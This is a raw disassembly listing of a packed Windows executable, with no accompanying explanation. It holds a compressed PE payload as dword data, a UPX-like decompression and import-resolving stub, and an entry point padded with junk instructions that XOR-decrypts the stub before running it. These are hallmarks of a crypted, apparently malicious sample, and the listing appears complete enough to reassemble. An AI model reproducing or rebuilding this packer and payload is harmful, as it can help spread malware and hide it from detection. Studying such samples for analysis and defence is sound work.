dd 72707377h, 66746E69h, 41h, 50000000h, 4C000045h, 8C000401h
dd 47F272h, 0
dd 0E0000000h, 0B010F00h, 601h, 120h, 0A0h, 8A000000h
dd 116h, 10h, 130h, 4000h, 10h, 4000010h, 0
dd 4000000h, 2 dup(0)
dd 1D0h, 10h, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 20000000h, 0DC00015Eh, 0
dd 280001C0h, 3, 12h dup(0)
dd 0B8000130h, 2, 5 dup(0)
dd 2E000000h, 74786574h, 0A5000000h, 117h, 10h, 120h, 10h
dd 2 dup(0)
dd 20000000h, 2E600000h, 74616472h, 86000061h, 3Dh, 130h
dd 40h, 130h, 2 dup(0)
dd 40000000h, 2E400000h, 61746164h, 14000000h, 4Dh, 170h
dd 10h, 170h, 2 dup(0)
dd 40000000h, 2EC00000h, 63727372h, 28000000h, 3, 1C0h
dd 10h, 180h, 2 dup(0)
dd 40000000h, 400000h, 0B40001C0h, 161h, 1CB4300h, 0A973F00h
dd 0C05D8723h, 20EFCF46h, 74A9464h, 765D031Ah, 56C6D6DBh
dd 0E477C6Bh, 1B642320h, 6D1A36C9h, 7D3009h, 31B30F17h
dd 61130D66h, 6E735B0Dh, 75856C75h, 0B36943F2h, 6F6D4A20h
dd 0EB9ACB6Bh, 1E116247h, 0CBA5232Fh, 8942B770h, 53626934h
dd 6B5AB917h, 69AA1772h, 0AE8F0382h, 9B5D5B6h, 0AD678D2Fh
dd 6CBE2C20h, 1B66F033h, 653F5B9Eh, 6D4BE015h, 1C4A33D9h
dd 7974206Bh, 565B5B61h, 6F2913E6h, 42B51A65h, 734CB38Ch
dd 0BE9A27BBh, 44B60DACh, 25201379h, 6D797356h, 1765B586h
dd 57736C46h, 3BFA268Bh, 5C4BD6B4h, 75B34BB4h, 819A7362h
dd 0C12C5687h, 0F1347931h, 0C070CF7Bh, 2120732Ah, 4212E7B3h
dd 0CD5AC2B6h, 0B0364B23h, 22FAC858h, 361B1F47h, 0CB8F04B2h
dd 12CA6D1Dh, 651B3F36h, 0C2E0D718h, 2016340Ah, 95215A6Bh
dd 7B2F04B0h, 0D14EE6AFh, 73B4E00h, 46B7075Eh, 326E6B93h
dd 0CD6B9120h, 736BD871h, 333526FAh, 19DB0967h, 1B20EB2Ch
dd 8987437Ah, 93A6AE1Bh, 45996820h, 5A15A323h, 2BCD0763h
dd 8F61A4ABh, 258D2765h, 0F359289Fh, 35455F6h, 5C2F2E2Eh
dd 70399F7Fh, 1E7FDC06h, 637553AFh, 3EDEE5Ah, 1143005Ch
dd 45276E64h, 0E68B37DFh, 0EC638ADAh, 8B002077h, 436C1B5Dh
dd 39631C6Fh, 536F2F19h, 0A2418910h, 0FB462020h, 0A344D623h
dd 6FF9593Fh, 0B42BFD38h, 451B3747h, 0AC9DD5F8h, 42BD869Dh
dd 53332220h, 0ADB5A8ADh, 58664F8Dh, 0C1B58963h, 0B61B6B5Eh
dd 2F531F99h, 0AD1CCDC8h, 0D4C4464Bh, 7D9B4639h, 5A8B950Fh
dd 0B2473425h, 0F8BDB1EFh, 4CC674ADh, 0F6774161h, 0AB7759BAh
dd 43547764h, 0C4E1829Eh, 203A4505h, 2F3AF819h, 67F4C1D9h
dd 0E7AA6D75h, 7B46851Bh, 0FA2D7BAEh, 2940CE64h, 5CD75959h
dd 932DECB8h, 0D0887925h, 0FFB6C0DAh, 21F53764h, 0AED21B6Eh
dd 65671C8Dh, 90660FFBh, 66C961BDh, 0AD2F970Bh, 0AD8DB470h
dd 3367FB54h, 367D5973h, 3A4386B2h, 35721164h, 185B709Fh
dd 73E51212h, 0B59B2D5Ah, 697644EDh, 235D7342h, 0AD1E9A10h
dd 661BF4B2h, 85AE566Fh, 29CFDC95h, 61C2DBD0h, 0A4C36169h
dd 0BDE12C78h, 9B23C343h, 14E720FCh, 0C1C3ED6Dh, 2D7B7DCBh
dd 692CB562h, 18B5CE1Dh, 6C083934h, 876073BBh, 0D83466F4h
dd 6D2F6472h, 0FD286183h, 6B7C7301h, 0E19F0332h, 610A4796h
dd 0DA112709h, 7818DEE6h, 0D10634Ah, 4EDA39C0h, 9F751409h
dd 0CDB0988Ch, 644A88D1h, 35695767h, 7BCE3A39h, 7967AC63h
dd 7B092C40h, 29E0AE78h, 87775589h, 6B2C223Ah, 0EE37BA24h
dd 0B1521172h, 0C06C2331h, 0A07B428Fh, 617F3FD4h, 1D9F2A5Fh
dd 7EA93003h, 0FFEC0EC7h, 3D6000FFh, 548FDF0Bh, 658E101Bh
dd 2B2B0008h, 5F3719D1h, 1AC5A012h, 386B5F0Fh, 8425119Bh
dd 0A0089F0Ah, 50050192h, 0A08F0C81h, 40041B0Ah, 5C513801h
dd 120182Eh, 50124743h, 4106A26Bh, 203E790Ch, 97011D01h
dd 74654701h, 0FECFC507h, 7A695315h, 73614C0Ch, 58F1D874h
dd 0C30DB115h, 6C694474h, 0FA44CDD8h, 54417913h, 0F6136711h
dd 6F6D59B7h, 54531176h, 5DB7441h, 6239748Ah, 13732D75h
dd 3FFD9B47h, 6D6E5580h, 69567061h, 664F7765h, 0BD80059Ah
dd 0A46E6ED9h, 482A7372h, 808B6D82h, 0FBC04776h, 7BED1046h
dd 573175AFh, 103CE24Dh, 6C505B4Ch, 6172DAC3h, 419A2324h
dd 730D9BD0h, 8A0C0EF3h, 37150CEh, 646441ECh, 0B78A4322h
dd 43C0404Bh, 6F543668h, 0F7325A4Dh, 4269B525h, 0A4D7479h
dd 730B0915h, 0AE141FC3h, 0B6EB7660h, 0BB70186Eh, 0BC6C9C67h
dd 8156372h, 0BCBC212Fh, 6D79DA4Dh, 0AB3EC37h, 0E478654Eh
dd 5D74538Eh, 400B140Ah, 84F849F2h, 10CFB420h, 7F646F4Dh
dd 0F750A4h, 6954BEEAh, 0D8443E6Dh, 9680310Ch, 0CD169BB9h
dd 64612DECh, 0EEF2C415h, 62A13191h, 0F1037B44h, 54C55330h
dd 6F506ADDh, 41EDB421h, 354C0FC2h, 2A9B6D6Bh, 0ED1149DEh
dd 630A6465h, 0B704386Bh, 4556D12h, 0BB78D24Dh, 30112DAFh
dd 0CB1A75B9h, 0C507B367h, 16EF6D72h, 0F84D449Fh, 4C344058h
dd 2B444943h, 0AC162C6Ch, 36681F6Ah, 908E6A41h, 6A3125ACh
dd 5B79705Bh, 30F60BBBh, 6157090Ah, 536AB169h, 0CDE398Ah
dd 624F3E7Eh, 214F266Ah, 87024C61h, 6F4A5838h, 4EE10DFBh
dd 0DF415461h, 43B74B17h, 17683530h, 4D427065h, 34E3611Eh
dd 0B4674000h, 0AF79654Bh, 0CC50473h, 0EA450BE7h, 75C80B98h
dd 0FEED530Eh, 36036B0Fh, 51200B61h, 9A6F571Bh, 5722586Dh
dd 10FFE85Ah, 6DF2FF1Bh, 212B7F9h, 0ABFF164Eh, 0AD9EFF03h
dd 0FF0B6305h, 7CB2F939h, 0FF15C4FBh, 10211433h, 1C9A9CFFh
dd 6F5AFF02h, 206D965Fh, 59175C0Bh, 519FF09h, 0D0000337h
dd 64BB37DDh, 3F21409Fh, 6F5F7369h, 66694093h, 63FEE75h
dd 51404036h, 58484542h, 640E1A5Ah, 0AC9FFF7Eh, 45411617h
dd 31564141h, 44415040h, 671E4048h, 96F64363h, 2074162Ah
dd 0F63D6337h, 50F07B2Dh, 3F185839h, 8DDB445Fh, 7E15802Ch
dd 63425017h, 59F622A3h, 5F687364h, 0B7BE6286h, 1EA79006h
dd 49424832h, 64505330h, 0DF4048C2h, 35AC9DD2h, 8A7B48h
dd 0E068E670h, 3F3E9636h, 0C0243F31h, 365FB673h, 0DDB4D686h
dd 554440E9h, 5F936310h, 0ED15FF0Eh, 44336ED6h, 40661840h
dd 76F61556h, 0F1E51985h, 16403213h, 9954EC63h, 4147785Bh
dd 3DD66442h, 0EA53842Bh, 409B6275h, 6D866E5Fh, 0A43FF851h
dd 164949B6h, 53C63B5Ch, 6C5FC366h, 3C66E444h, 59CAA52Bh
dd 706E5471h, 2B28BE1Eh, 49324C63h, 28344B42h, 904A8C74h
dd 15B3D30h, 5506742h, 254D9E40h, 370C28DCh, 376E6730h
dd 429C38E6h, 54D39136h, 2342001Bh, 824DE581h, 8F8622ABh
dd 38C7D87Ah, 38DA5563h, 0F64159EAh, 5FC30488h, 309A514Eh
dd 8740140h, 0DC5AC204h, 4E1A0636h, 9C7CC9D3h, 0F7B76E3Ch
dd 86A6B60h, 74056C3Ch, 5D980BA4h, 5F69CB7Ah, 706DE11Bh
dd 0F4AD070Ah, 6D08A715h, 0B5860754h, 5509372Dh, 0F5F1910h
dd 0BB5B635Eh, 0B676F3Ah, 664A6D3Ah, 8B173982h, 2A940EE4h
dd 63021602h, 7C862E0h, 4C9766BCh, 1EB5DF44h, 78435F3Fh
dd 0B4944678h, 0FD0CDCFDh, 68541127h, 0E6837753h, 43FB4586h
dd 0E66CFF63h, 866ADE0h, 0A1736377h, 9D6B9A88h, 50666803h
dd 75966FB8h, 59B1066Ch, 288F2098h, 0F7BDAEB2h, 9F0A626Eh
dd 9863B32Ch, 0D8ECDEF5h, 0F66D6742h, 2EB3A92Ah, 0F8DEE801h
dd 836FAC55h, 64AA75C8h, 0F7690537h, 64B06D13h, 62580608h
dd 160ED0A8h, 5F12A389h, 5B756D67h, 4404AD40h, 610E7375h
dd 0AD7A0267h, 3EBA406Ch, 0EB44F627h, 90226D5Eh, 68980375h
dd 0BAEF705h, 6A9CFCBCh, 64665F75h, 211F7669h, 70E803A8h
dd 0B36D4A5Fh, 99D86E6Bh, 390B660Dh, 1F09F32Ch, 0A95F6F62h
dd 685F2C86h, 2D734245h, 4B6633C2h, 67383E18h, 0A086D1B3h
dd 87897066h, 120A22A4h, 0EA6FA150h, 0D835E2C4h, 324F683Eh
dd 91177C52h, 314C4A82h, 0D9A620EEh, 49117D92h, 60914027h
dd 0DB2CB2CBh, 9020CFFh, 6969508h, 2CB2DB34h, 6402C807h
dd 1859889Eh, 4853F89Eh, 75954FD6h, 0B66930B1h, 8F90AA7Fh
dd 0DACD0F52h, 71451863h, 0D20A5B75h, 0C105155h, 0E641C40Fh
dd 7B60A0F0h
dd 45503152h, 83FD4C03h, 8C435F10h, 3647F272h, 10F00E0h
dd 9A06010Bh, 55B359EEh, 8A13A020h, 30100B16h, 0A766EBh
dd 4030B50h, 4ECDEE1Eh, 0D0000736h, 96B20027h, 2467606Ch
dd 2F060710h, 396FB710h, 8DC5E20h, 32807C0h, 8056ED85h
dd 2B8A7B8h, 35D9064Fh, 74C42E74h, 2017A5AFh, 0CB6486D0h
dd 2E929BB7h, 3760D872h, 86083153h, 740FB3Dh, 2CB7ECFBh
dd 2E401200h, 4D140026h, 1B29B64Bh, 277070A4h, 1B734FC0h
dd 1A95CC6Ch, 27C0EB0Bh, 0FF004F80h, 0B41B2B7Eh, 0CB431761h
dd 1, 0
; ---------------------------------------------------------------------------
add byte ptr [edi+edi*8], 0
loc_41E580: ; DATA XREF: start+86�o
pusha
mov esi, offset dword_416000
lea edi, [esi-15000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_41E5A2
; ---------------------------------------------------------------------------
align 8
loc_41E598: ; CODE XREF: HSho:loc_41E5A9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_41E59E: ; CODE XREF: HSho:0041E636�j
; HSho:0041E64D�j
add ebx, ebx
jnz short loc_41E5A9
loc_41E5A2: ; CODE XREF: HSho:0041E590�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41E5A9: ; CODE XREF: HSho:0041E5A0�j
jb short loc_41E598
mov eax, 1
loc_41E5B0: ; CODE XREF: HSho:0041E5BF�j
; HSho:0041E5CA�j
add ebx, ebx
jnz short loc_41E5BB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41E5BB: ; CODE XREF: HSho:0041E5B2�j
adc eax, eax
add ebx, ebx
jnb short loc_41E5B0
jnz short loc_41E5CC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_41E5B0
loc_41E5CC: ; CODE XREF: HSho:0041E5C1�j
xor ecx, ecx
sub eax, 3
jb short loc_41E5E0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_41E652
mov ebp, eax
loc_41E5E0: ; CODE XREF: HSho:0041E5D1�j
add ebx, ebx
jnz short loc_41E5EB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41E5EB: ; CODE XREF: HSho:0041E5E2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_41E5F8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41E5F8: ; CODE XREF: HSho:0041E5EF�j
adc ecx, ecx
jnz short loc_41E61C
inc ecx
loc_41E5FD: ; CODE XREF: HSho:0041E60C�j
; HSho:0041E617�j
add ebx, ebx
jnz short loc_41E608
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_41E608: ; CODE XREF: HSho:0041E5FF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_41E5FD
jnz short loc_41E619
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_41E5FD
loc_41E619: ; CODE XREF: HSho:0041E60E�j
add ecx, 2
loc_41E61C: ; CODE XREF: HSho:0041E5FA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_41E63C
loc_41E62D: ; CODE XREF: HSho:0041E634�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_41E62D
jmp loc_41E59E
; ---------------------------------------------------------------------------
align 4
loc_41E63C: ; CODE XREF: HSho:0041E62B�j
; HSho:0041E649�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_41E63C
add edi, ecx
jmp loc_41E59E
; ---------------------------------------------------------------------------
loc_41E652: ; CODE XREF: HSho:0041E5DC�j
pop esi
mov edi, esi
mov ecx, 743h
loc_41E65A: ; CODE XREF: HSho:0041E661�j
; HSho:0041E666�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_41E65F: ; CODE XREF: HSho:0041E684�j
cmp al, 1
ja short loc_41E65A
cmp byte ptr [edi], 6
jnz short loc_41E65A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_41E65F
lea edi, [esi+1C000h]
loc_41E68C: ; CODE XREF: HSho:0041E6AE�j
mov eax, [edi]
or eax, eax
jz short loc_41E6D7
mov ebx, [edi+4]
lea eax, [eax+esi+1E324h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+1E400h]
xchg eax, ebp
loc_41E6A9: ; CODE XREF: HSho:0041E6CF�j
mov al, [edi]
inc edi
or al, al
jz short loc_41E68C
mov ecx, edi
jns short near ptr loc_41E6BA+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_41E6BA: ; CODE XREF: HSho:0041E6B2�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+1E404h]
or eax, eax
jz short loc_41E6D1
mov [ebx], eax
add ebx, 4
jmp short loc_41E6A9
; ---------------------------------------------------------------------------
loc_41E6D1: ; CODE XREF: HSho:0041E6C8�j
call dword ptr [esi+1E414h]
loc_41E6D7: ; CODE XREF: HSho:0041E690�j
mov ebp, [esi+1E408h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+1FFh]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp-80h]
loc_41E70B: ; CODE XREF: HSho:0041E70F�j
push 0
cmp esp, eax
jnz short loc_41E70B
sub esp, 0FFFFFF80h
jmp loc_41168A
; ---------------------------------------------------------------------------
align 4
dd 8 dup(0)
db 0
; =============== S U B R O U T I N E =======================================
public start
start proc far
var_C = dword ptr -0Ch
repne mov ecx, 29DEF744h
mov al, dh
test eax, 0FE976475h
xchg ecx, eax
mov esi, 1E378415h
jmp short loc_41E756
; ---------------------------------------------------------------------------
db 14h
; ---------------------------------------------------------------------------
loc_41E756: ; CODE XREF: start+16�j
adc eax, 3ED7A4B5h
and ecx, edi
lea edi, ds:5E77C455h
imul ecx, eax, 796EC754h
db 65h
btc edi, 0C5h
adc eax, 9EB70495h
movzx ecx, di
shld edi, esi, 35h
adc esi, ebp
test dh, cl
mov ebx, ecx
inc ecx
test eax, 86BFAC5Dh
inc ecx
repne lea ebp, ds:5CCD527Bh
repne xadd bh, ah
btc ebx, edx
mov ecx, 796EC754h
jmp short loc_41E79E
; ---------------------------------------------------------------------------
pop ss
loc_41E79E: ; CODE XREF: start+5E�j
mov dh, ah
shrd ebp, edi, cl
jmp short loc_41E7A6
; ---------------------------------------------------------------------------
push ecx
loc_41E7A6: ; CODE XREF: start+66�j
cmp al, 2Fh
rep xadd bh, ah
xor ebx, ecx
and ecx, edi
db 64h
rcr ah, cl
imul ebx, edx
jmp short loc_41E7BA
; ---------------------------------------------------------------------------
align 2
loc_41E7BA: ; CODE XREF: start+7A�j
bsf edi, esi
jmp short loc_41E7C0
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
loc_41E7C0: ; CODE XREF: start+80�j
push ebp
mov ebp, esp
mov edi, offset loc_41E580
mov esi, edi
mov ecx, 0AFh
loc_41E7CF: ; CODE XREF: start+AF�j
xor byte ptr [edi], 21h
push eax
mov eax, 2
push eax
add edi, [esp+0]
pop eax
pop eax
push ecx
sub ecx, ecx
mov ecx, 1
loc_41E7E6: ; CODE XREF: start+AC�j
sub edi, 1
loop loc_41E7E6
pop ecx
loop loc_41E7CF
jmp esi
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 1000h
HSho ends
; Section 4. (virtual address 00020000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 420000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start